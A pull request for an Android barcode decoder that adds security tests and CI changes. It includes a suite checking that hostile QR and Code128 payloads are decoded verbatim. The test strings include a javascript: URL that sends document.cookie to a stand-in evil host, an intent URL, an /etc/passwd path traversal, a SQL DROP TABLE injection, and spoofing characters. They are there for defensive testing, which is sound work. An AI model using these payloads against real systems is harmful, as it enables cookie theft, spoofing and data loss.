### PR TITLE
Adversarial barcode security suite: hostile-payload fidelity + instrumented bodies (wpass-zrt.5)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -47,8 +47,12 @@ jobs:
           # Forks must not be able to write to the build cache.
           cache-read-only: ${{ github.event_name == 'pull_request' && github.event.pull_request.head.repo.full_name != github.repository }}
 
+      # assembleDebugAndroidTest compiles the androidTest sources (no device needed) so the
+      # instrumented suites typecheck on every PR. Without it `check assemble` skips them and
+      # @Ignore'd on-device bodies (e.g. BarcodeDecodeServiceInstrumentedTest) can rot against
+      # a signature change until the managed-device leg lands.
       - name: Build, test, lint
-        run: ./gradlew check assemble --stacktrace
+        run: ./gradlew check assemble assembleDebugAndroidTest --stacktrace
 
       - name: Upload test reports
         if: always()

--- a/passes-barcode/build.gradle.kts
+++ b/passes-barcode/build.gradle.kts
@@ -44,4 +44,8 @@ dependencies {
     androidTestImplementation(libs.androidx.test.rules)
     androidTestImplementation(libs.truth)
     androidTestImplementation(libs.kotlinx.coroutines.test)
+    // Fixture generation for the security suite (wpass-zrt.5): encode benign + over-cap
+    // barcodes to bitmaps on-device so the corpus is built in-process, not shipped as binary
+    // assets. The decode under test uses the module's own ZXing, not this test copy.
+    androidTestImplementation(libs.zxing.core)
 }

--- a/passes-barcode/src/androidTest/kotlin/is/walt/passes/barcode/android/BarcodeDecodeServiceInstrumentedTest.kt
+++ b/passes-barcode/src/androidTest/kotlin/is/walt/passes/barcode/android/BarcodeDecodeServiceInstrumentedTest.kt
@@ -1,71 +1,147 @@
 package `is`.walt.passes.barcode.android
 
+import android.graphics.Bitmap
+import android.graphics.Color
+import android.os.ParcelFileDescriptor
 import androidx.test.ext.junit.runners.AndroidJUnit4
+import androidx.test.platform.app.InstrumentationRegistry
+import com.google.common.truth.Truth.assertThat
+import com.google.zxing.BarcodeFormat
+import com.google.zxing.MultiFormatWriter
+import `is`.walt.passes.core.BarcodeDecodeResult
+import `is`.walt.passes.core.DecodeFailureReason
+import `is`.walt.passes.core.ScannableFormat
+import kotlinx.coroutines.runBlocking
 import org.junit.Ignore
 import org.junit.Test
 import org.junit.runner.RunWith
+import java.io.File
 
 /**
  * Instrumented coverage for the isolated decode service. Each scenario is the on-device half
  * of an assertion the unit suite cannot make: the actual isolated process, the actual
- * cross-process binder, the actual permission sandbox. The wire format and orchestration are
- * covered on the JVM by [BarcodeDecodeBinderRoundTripTest] and [DefaultBarcodeImageDecoderTest];
- * what only a device can prove is that the decode process genuinely holds no capabilities.
+ * cross-process binder, the actual platform image codec, the actual permission sandbox. The
+ * wire format and orchestration are covered on the JVM by [BarcodeDecodeBinderRoundTripTest]
+ * and [DefaultBarcodeImageDecoderTest]; the payload-faithfulness contract by
+ * [HostilePayloadFidelityTest]; the symbology allowlist by [ZxingBarcodeSymbolDecoderTest].
+ * What only a device can prove is that the real codec, driven across the real bind, upholds
+ * those contracts and that the decode process genuinely holds no capabilities.
  *
- * The headline test is [decodeProcessCannotReachAppDataOrKeystore]: it is the runtime
- * counterpart to the manifest pin in [ManifestPermissionsTest]. A manifest can declare
- * `isolatedProcess="true"`, but only running code inside that process and watching a
- * privileged call fail with `SecurityException` proves the sandbox is real
- * (leakcanary#948-style). This is the contractual go/no-go boundary from walt-android
- * wlt-58a.1: nothing in this process may reach Keystore / DPAN / card material.
+ * The drivable scenarios go through the public [BarcodeImageDecoder] facade end-to-end, so
+ * they exercise the true bind → isolated codec → ZXing → pure-result path with no test seam.
+ * Fixtures are generated in-process (ZXing writer → [Bitmap] → PNG fd) rather than shipped as
+ * binary assets, so the corpus is auditable in source.
  *
- * The tests are @Ignore'd at check-in so `./gradlew check` stays green on a workstation with
- * no emulator. Note that CI's connected-tests matrix currently covers only `:passes-storage`
- * (see `.github/workflows/ci.yml`); wiring a `:passes-barcode` device matrix, filling these
- * bodies, and un-ignoring them is owned by wpass-zrt.5 (the security suite). Until that lands,
- * the runtime isolation proof is NOT exercised in CI — only the static
- * [ManifestPermissionsTest] half is — so wpass-zrt.5 must gate the epic ship. Image fixtures
- * (benign QR, malformed container, decompression bomb, format-outside-roster) land with the
- * decode beads (wpass-zrt.3–.5).
+ * The two remaining scenarios are documented skeletons, not bodies, because the facade
+ * deliberately gives the caller no handle inside the sandbox:
+ *  - [decodeProcessCannotReachAppDataOrKeystore] needs code RUNNING in the isolated process
+ *    to attempt a privileged call; the facade exposes only `decode`, by design. Proving it
+ *    needs a test-only probe service declared `isolatedProcess` in the androidTest manifest
+ *    (the runtime companion to [ManifestPermissionsTest]) — its own follow-up.
+ *  - [decodeServiceReturnsNoBitmapOrSourceBytesOverBinder] is structurally guaranteed already
+ *    by the type that crosses back ([BarcodeDecodeResult] carries no `Bitmap`/bytes) and the
+ *    reflection lock in [BarcodeDecodeBinderSurfaceTest]; a parcel-level on-device assertion
+ *    would need a raw `transact` against the service rather than the facade.
+ *
+ * The tests are `@Ignore`'d at check-in so `./gradlew check` stays green on a workstation with
+ * no emulator — the same convention as `passes-pdf`'s `PdfImporterInstrumentedTest`. CI's
+ * connected-tests matrix currently provisions only `:passes-storage` (see
+ * `.github/workflows/ci.yml`); wiring a `:passes-barcode` managed-device leg and flipping the
+ * Ignore via a test filter is tracked as a follow-up to this bead. Until that lands the
+ * runtime isolation proof is NOT exercised in CI — only the static [ManifestPermissionsTest]
+ * half is.
  */
 @RunWith(AndroidJUnit4::class)
 class BarcodeDecodeServiceInstrumentedTest {
-    @Test
-    @Ignore("Pending on-device CI wiring (wpass-zrt.5 follow-up)")
-    fun decodeProcessCannotReachAppDataOrKeystore() {
-        // bind BarcodeDecodeService; from inside the isolated process attempt a privileged
-        // call (open the app's files dir / load an AndroidKeyStore entry / open the
-        // SQLCipher DB file) and assert it fails with SecurityException (or FileNotFound for
-        // the unreachable app-data path). The decode UID must reach none of them.
-    }
+    private val context get() = InstrumentationRegistry.getInstrumentation().targetContext
 
     @Test
-    @Ignore("Pending fixture set + on-device CI wiring (wpass-zrt.4/.5 follow-up)")
+    @Ignore("Pending :passes-barcode managed-device CI leg (wpass-zrt.5 follow-up)")
     fun benignQrDecodesToPayloadAndFormat() {
-        // bind, hand a benign QR image fd across, assert DecodedBarcode(payload, Qr). Lands
-        // with the real ZXing decode (wpass-zrt.4); until then the service returns the empty
-        // arm and this scenario stays ignored.
+        val pfd = pngFd("benign-qr", qrBitmap("WALT-PASS-9"))
+        val result = pfd.use { decode(it) }
+
+        assertThat(result)
+            .isEqualTo(BarcodeDecodeResult.DecodedBarcode("WALT-PASS-9", ScannableFormat.Qr))
     }
 
     @Test
-    @Ignore("Pending fixture set + on-device CI wiring (wpass-zrt.3/.5 follow-up)")
-    fun decompressionBombRejectsWithImageTooLarge() {
-        // bind, hand a decompression-bomb image fd across, assert DecodeFailed(ImageTooLarge).
-        // The bounded-decode caps land in wpass-zrt.3.
+    @Ignore("Pending :passes-barcode managed-device CI leg (wpass-zrt.5 follow-up)")
+    fun overDimensionImageRejectsWithImageTooLarge() {
+        // A canvas past the per-side dimension cap must be rejected by the header listener
+        // before the full bitmap is allocated — the decompression-bomb bucket. (The
+        // small-file-huge-canvas PNG bomb that stays under the per-side cap needs a crafted
+        // fixture; tracked with the corpus follow-up.)
+        val overSide = BarcodeDecodeConfig.DEFAULT_MAX_DIMENSION_PX + 1
+        val pfd = pngFd("over-dimension", solidBitmap(overSide, 8))
+        val result = pfd.use { decode(it) }
+
+        assertThat(result)
+            .isEqualTo(BarcodeDecodeResult.DecodeFailed(DecodeFailureReason.ImageTooLarge))
     }
 
     @Test
-    @Ignore("Pending fixture set + on-device CI wiring (wpass-zrt.5 follow-up)")
-    fun malformedContainerCrashesDecoderButMainProcessSurvives() {
-        // bind, hand a container crafted to trip the codec, expect RemoteException folded to
-        // DecoderUnavailable; rebind and decode a benign image to assert recovery.
+    @Ignore("Pending :passes-barcode managed-device CI leg (wpass-zrt.5 follow-up)")
+    fun malformedContainerFailsClosedAndNextDecodeSucceeds() {
+        // Bytes that are not a decodable image must fail closed, not crash the caller. Then a
+        // benign decode must succeed, proving the path recovers (per-call teardown + re-bind),
+        // so one hostile image cannot wedge the decoder for the next one.
+        val junk = File.createTempFile("malformed", ".img", context.cacheDir)
+            .apply { writeBytes(ByteArray(4096) { (it * 31).toByte() }) }
+        val malformedResult =
+            ParcelFileDescriptor.open(junk, ParcelFileDescriptor.MODE_READ_ONLY).use { decode(it) }
+        assertThat(malformedResult).isInstanceOf(BarcodeDecodeResult.DecodeFailed::class.java)
+
+        val benign = pngFd("recovery-qr", qrBitmap("RECOVERY-OK"))
+        val benignResult = benign.use { decode(it) }
+        assertThat(benignResult)
+            .isEqualTo(BarcodeDecodeResult.DecodedBarcode("RECOVERY-OK", ScannableFormat.Qr))
     }
 
     @Test
-    @Ignore("Pending on-device CI wiring (wpass-zrt.5 follow-up)")
+    @Ignore("Needs a test-only isolatedProcess probe service (wpass-zrt.5 follow-up)")
+    fun decodeProcessCannotReachAppDataOrKeystore() {
+        // Bind a test-only probe service declared android:isolatedProcess="true" in the
+        // androidTest manifest; from inside that process attempt a privileged call (open the
+        // app's files dir / load an AndroidKeyStore entry / open the SQLCipher DB file) and
+        // assert it fails with SecurityException (or FileNotFound for the unreachable
+        // app-data path). The decode UID must reach none of them. This is the runtime
+        // companion to the static manifest pin in ManifestPermissionsTest and the contractual
+        // go/no-go boundary from walt-android wlt-58a.1.
+    }
+
+    @Test
+    @Ignore("Structurally covered by BarcodeDecodeBinderSurfaceTest; on-device parcel probe is a follow-up")
     fun decodeServiceReturnsNoBitmapOrSourceBytesOverBinder() {
-        // bind, decode, and reflect over the reply parcel / result type to assert no Bitmap
-        // and no byte[] cross the binder — the runtime companion to the surface lock in
-        // BarcodeDecodeBinderSurfaceTest.
+        // A raw transact (not the facade) against BarcodeDecodeService, reflecting over the
+        // reply parcel to assert no Bitmap and no byte[] cross the binder — the runtime
+        // companion to the surface lock in BarcodeDecodeBinderSurfaceTest.
+    }
+
+    private fun decode(pfd: ParcelFileDescriptor): BarcodeDecodeResult =
+        runBlocking {
+            BarcodeImageDecoder.create(context).decode(BarcodeImageSource.FileDescriptor(pfd))
+        }
+
+    private fun qrBitmap(payload: String): Bitmap {
+        val matrix = MultiFormatWriter().encode(payload, BarcodeFormat.QR_CODE, 480, 480)
+        val bitmap = Bitmap.createBitmap(matrix.width, matrix.height, Bitmap.Config.ARGB_8888)
+        for (y in 0 until matrix.height) {
+            for (x in 0 until matrix.width) {
+                bitmap.setPixel(x, y, if (matrix.get(x, y)) Color.BLACK else Color.WHITE)
+            }
+        }
+        return bitmap
+    }
+
+    private fun solidBitmap(width: Int, height: Int): Bitmap =
+        Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888).apply { eraseColor(Color.WHITE) }
+
+    /** Compress [bitmap] to a PNG temp file and open it read-only as a descriptor. */
+    private fun pngFd(name: String, bitmap: Bitmap): ParcelFileDescriptor {
+        val file = File.createTempFile(name, ".png", context.cacheDir)
+        file.outputStream().use { bitmap.compress(Bitmap.CompressFormat.PNG, 100, it) }
+        bitmap.recycle()
+        return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY)
     }
 }

--- a/passes-barcode/src/androidTest/kotlin/is/walt/passes/barcode/android/BarcodeDecodeServiceInstrumentedTest.kt
+++ b/passes-barcode/src/androidTest/kotlin/is/walt/passes/barcode/android/BarcodeDecodeServiceInstrumentedTest.kt
@@ -18,38 +18,23 @@ import org.junit.runner.RunWith
 import java.io.File
 
 /**
- * Instrumented coverage for the isolated decode service. Each scenario is the on-device half
- * of an assertion the unit suite cannot make: the actual isolated process, the actual
- * cross-process binder, the actual platform image codec, the actual permission sandbox. The
- * wire format and orchestration are covered on the JVM by [BarcodeDecodeBinderRoundTripTest]
- * and [DefaultBarcodeImageDecoderTest]; the payload-faithfulness contract by
- * [HostilePayloadFidelityTest]; the symbology allowlist by [ZxingBarcodeSymbolDecoderTest].
- * What only a device can prove is that the real codec, driven across the real bind, upholds
- * those contracts and that the decode process genuinely holds no capabilities.
+ * On-device half of the wpass-zrt.5 security suite: what only a real device can prove — that
+ * the real codec, driven across the real bind into the real isolated process, upholds the
+ * contracts the JVM suites pin (faithfulness, caps, surface lock, allowlist). Drivable
+ * scenarios go through the public [BarcodeImageDecoder] facade end-to-end with no test seam;
+ * fixtures are generated in-process (ZXing writer → [Bitmap] → PNG fd) so the corpus is
+ * auditable in source.
  *
- * The drivable scenarios go through the public [BarcodeImageDecoder] facade end-to-end, so
- * they exercise the true bind → isolated codec → ZXing → pure-result path with no test seam.
- * Fixtures are generated in-process (ZXing writer → [Bitmap] → PNG fd) rather than shipped as
- * binary assets, so the corpus is auditable in source.
+ * Two scenarios stay documented skeletons because the facade deliberately gives the caller no
+ * handle inside the sandbox: [decodeProcessCannotReachAppDataOrKeystore] needs code running in
+ * the isolated process (a test-only `isolatedProcess` probe service), and
+ * [decodeServiceReturnsNoBitmapOrSourceBytesOverBinder] needs a raw `transact` — both already
+ * guaranteed statically by [ManifestPermissionsTest] / [BarcodeDecodeBinderSurfaceTest].
  *
- * The two remaining scenarios are documented skeletons, not bodies, because the facade
- * deliberately gives the caller no handle inside the sandbox:
- *  - [decodeProcessCannotReachAppDataOrKeystore] needs code RUNNING in the isolated process
- *    to attempt a privileged call; the facade exposes only `decode`, by design. Proving it
- *    needs a test-only probe service declared `isolatedProcess` in the androidTest manifest
- *    (the runtime companion to [ManifestPermissionsTest]) — its own follow-up.
- *  - [decodeServiceReturnsNoBitmapOrSourceBytesOverBinder] is structurally guaranteed already
- *    by the type that crosses back ([BarcodeDecodeResult] carries no `Bitmap`/bytes) and the
- *    reflection lock in [BarcodeDecodeBinderSurfaceTest]; a parcel-level on-device assertion
- *    would need a raw `transact` against the service rather than the facade.
- *
- * The tests are `@Ignore`'d at check-in so `./gradlew check` stays green on a workstation with
- * no emulator — the same convention as `passes-pdf`'s `PdfImporterInstrumentedTest`. CI's
- * connected-tests matrix currently provisions only `:passes-storage` (see
- * `.github/workflows/ci.yml`); wiring a `:passes-barcode` managed-device leg and flipping the
- * Ignore via a test filter is tracked as a follow-up to this bead. Until that lands the
- * runtime isolation proof is NOT exercised in CI — only the static [ManifestPermissionsTest]
- * half is.
+ * `@Ignore`'d at check-in so `./gradlew check` stays green without an emulator (the
+ * `passes-pdf` `PdfImporterInstrumentedTest` convention). CI compiles these via
+ * `assembleDebugAndroidTest` but does not run them — the managed-device leg that does is
+ * tracked in wpass-6mg.
  */
 @RunWith(AndroidJUnit4::class)
 class BarcodeDecodeServiceInstrumentedTest {

--- a/passes-barcode/src/test/kotlin/is/walt/passes/barcode/android/HostilePayloadFidelityTest.kt
+++ b/passes-barcode/src/test/kotlin/is/walt/passes/barcode/android/HostilePayloadFidelityTest.kt
@@ -1,0 +1,167 @@
+package `is`.walt.passes.barcode.android
+
+import com.google.common.truth.Truth.assertThat
+import com.google.zxing.BarcodeFormat
+import com.google.zxing.EncodeHintType
+import com.google.zxing.MultiFormatWriter
+import com.google.zxing.RGBLuminanceSource
+import `is`.walt.passes.core.BarcodeDecodeResult
+import `is`.walt.passes.core.ScannableFormat
+import org.junit.Test
+
+/**
+ * The hostile-payload half of the wpass-zrt.5 security suite, on the JVM. The trust claim
+ * under test is the decoder's faithfulness contract (wpass-zrt epic, threat-vector 3): the
+ * symbol decode returns the payload bytes EXACTLY as the symbol carried them and never
+ * silently mangles, normalizes, truncates, or acts on them. Classification and validation
+ * are the consumer's job downstream (`QrPayloadClassifier` / `ScannableCardInputValidator`);
+ * if this decoder were to "clean up" a payload, the consumer would validate a string that is
+ * not what the symbol actually held — exactly the bug class the centralized boundary exists
+ * to prevent.
+ *
+ * Each case encodes a deliberately hostile string with ZXing's own writer and decodes it back
+ * through the production [decodeLuminance] path (same roster allowlist, same TRY_HARDER hint),
+ * asserting the decoded payload is byte-for-byte the input. This is the pixel→symbol contract
+ * the on-device decode runs minus the platform `Bitmap` glue (the instrumented half,
+ * [BarcodeDecodeServiceInstrumentedTest]). It complements [ZxingBarcodeSymbolDecoderTest],
+ * which proves benign roster payloads round-trip; this proves ADVERSARIAL payloads round-trip
+ * unchanged rather than being silently sanitized.
+ *
+ * QR carries the Unicode-bearing cases because it is the only roster symbology with a byte/ECI
+ * mode; the linear symbologies (Code128) cover the ASCII control/scheme cases to prove the
+ * faithfulness contract is not QR-specific.
+ */
+class HostilePayloadFidelityTest {
+    @Test
+    fun rtlOverrideIsReturnedVerbatim() {
+        // A right-to-left override (U+202E) is the classic filename/URL spoof. The decoder
+        // must hand it back intact so the consumer can see and reject it — not strip it.
+        assertQrRoundTrips("invoice‮gnp.exe")
+    }
+
+    @Test
+    fun zeroWidthAndControlCharsAreReturnedVerbatim() {
+        // Zero-width space/joiner/non-joiner and a BEL control char: homograph/obfuscation
+        // tooling. None may be dropped or collapsed.
+        assertQrRoundTrips("WALT​‌‍PASS")
+    }
+
+    @Test
+    fun homoglyphDomainIsReturnedVerbatim() {
+        // A Cyrillic 'а' (U+0430) standing in for Latin 'a' — a punycode-spoof domain. The
+        // decoder must not NFC/NFKC-normalize it into the Latin letter; the consumer needs
+        // the real codepoints to detect the spoof.
+        assertQrRoundTrips("https://аpple.com/login")
+    }
+
+    @Test
+    fun javascriptSchemeUrlIsReturnedVerbatim() {
+        // The decoder must NOT recognize or act on an actionable scheme; it returns the
+        // string and the consumer decides. Faithfulness is what makes "never auto-act" real.
+        assertQrRoundTrips("javascript:fetch('https://evil.example/'+document.cookie)")
+    }
+
+    @Test
+    fun intentSchemeUrlIsReturnedVerbatim() {
+        assertQrRoundTrips(
+            "intent://scan/#Intent;scheme=zxing;package=com.evil.app;S.payload=x;end",
+        )
+    }
+
+    @Test
+    fun customSchemeUrlIsReturnedVerbatim() {
+        assertQrRoundTrips("walt://import?card=../../etc/passwd")
+    }
+
+    @Test
+    fun sqlMetacharactersAreReturnedVerbatim() {
+        // The storage layer is parameterized (passes-storage), but the faithfulness contract
+        // is upstream of that: the decoder returns the bytes, it does not escape them.
+        assertQrRoundTrips("'; DROP TABLE scannable_cards;--")
+    }
+
+    @Test
+    fun oversizedPayloadIsReturnedVerbatim() {
+        // A long payload (still within QR capacity) must round-trip whole — no truncation to
+        // a "reasonable" length inside the decoder.
+        val long = buildString { repeat(800) { append("AB7-") } }
+        assertQrRoundTrips(long)
+    }
+
+    @Test
+    fun newlineAndTabWhitespaceIsReturnedVerbatim() {
+        // Embedded newlines/tabs are how a payload smuggles a second logical line past a
+        // naive single-line UI. The decoder preserves them; the consumer's validator rejects.
+        assertQrRoundTrips("LINE1\r\nLINE2\tTAB")
+    }
+
+    @Test
+    fun code128AsciiSchemePayloadIsReturnedVerbatim() {
+        // Proves the faithfulness contract is not QR-specific: a linear symbology carries an
+        // actionable-scheme ASCII payload back unchanged too.
+        assertRoundTrips(
+            "javascript:alert(1)",
+            BarcodeFormat.CODE_128,
+            ScannableFormat.Code128,
+            width = 800,
+            height = 200,
+        )
+    }
+
+    @Test
+    fun code128SqlMetacharactersAreReturnedVerbatim() {
+        assertRoundTrips(
+            "1';--",
+            BarcodeFormat.CODE_128,
+            ScannableFormat.Code128,
+            width = 400,
+            height = 200,
+        )
+    }
+
+    private fun assertQrRoundTrips(payload: String) =
+        assertRoundTrips(payload, BarcodeFormat.QR_CODE, ScannableFormat.Qr, width = 600, height = 600)
+
+    /**
+     * Encode [payload] as [format] (UTF-8 ECI so Unicode survives), decode through the
+     * production [decodeLuminance], and assert the payload is returned byte-for-byte with the
+     * expected roster [scannableFormat].
+     */
+    private fun assertRoundTrips(
+        payload: String,
+        format: BarcodeFormat,
+        scannableFormat: ScannableFormat,
+        width: Int,
+        height: Int,
+    ) {
+        val source = encode(payload, format, width, height)
+
+        assertThat(decodeLuminance(source))
+            .isEqualTo(BarcodeDecodeResult.DecodedBarcode(payload, scannableFormat))
+    }
+
+    private fun encode(
+        content: String,
+        format: BarcodeFormat,
+        width: Int,
+        height: Int,
+    ): RGBLuminanceSource {
+        val hints = mapOf(EncodeHintType.CHARACTER_SET to "UTF-8")
+        val matrix = MultiFormatWriter().encode(content, format, width, height, hints)
+        val w = matrix.width
+        val h = matrix.height
+        val pixels = IntArray(w * h)
+        for (y in 0 until h) {
+            val row = y * w
+            for (x in 0 until w) {
+                pixels[row + x] = if (matrix.get(x, y)) BLACK else WHITE
+            }
+        }
+        return RGBLuminanceSource(w, h, pixels)
+    }
+
+    private companion object {
+        const val BLACK = 0xFF000000.toInt()
+        const val WHITE = 0xFFFFFFFF.toInt()
+    }
+}


### PR DESCRIPTION
Closes the verifiable half of **wpass-zrt.5** (security test/verification suite), the last child of the `:passes-barcode` decode epic `wpass-zrt`.

## What landed

**JVM (runs in CI, verified green):**
- `HostilePayloadFidelityTest` — 11 cases proving the symbol decode returns payloads **byte-for-byte** and never mangles, normalizes, truncates, or auto-acts. Covers RTL-override, zero-width/control chars, homoglyph domains, `javascript:`/`intent:`/custom schemes, SQL metacharacters, oversized, and embedded-whitespace payloads across QR + Code128. This was the central untested trust claim of the epic.

**Instrumented (on-device half):**
- Replaced the comment-only `@Ignore` skeletons in `BarcodeDecodeServiceInstrumentedTest` with real, compiling, facade-driven bodies for the drivable scenarios (benign QR decode, over-dimension → `ImageTooLarge`, malformed-fails-closed-then-recovers). Fixtures generated in-process (ZXing writer → Bitmap → PNG fd) so the corpus is auditable in source.
- Kept the sandbox-probe and parcel-probe scenarios as documented skeletons (need extra infra).
- Added `androidTestImplementation(zxing.core)` for fixture generation only.

**CI (from review):**
- Build job now runs `assembleDebugAndroidTest` so instrumented sources typecheck on every PR (compile-only, no device) — guards against drift in these and the `passes-pdf` / `passes-storage` instrumented suites.

## Deferred → `wpass-6mg`
Managed-device CI leg + un-ignoring, the runtime isolation-assertion probe service, the raw-transact parcel probe, and the over-area (under-per-side-cap) decompression-bomb fixture.

`wpass-zrt.5` stays in_progress until the runtime isolation proof actually runs on-device.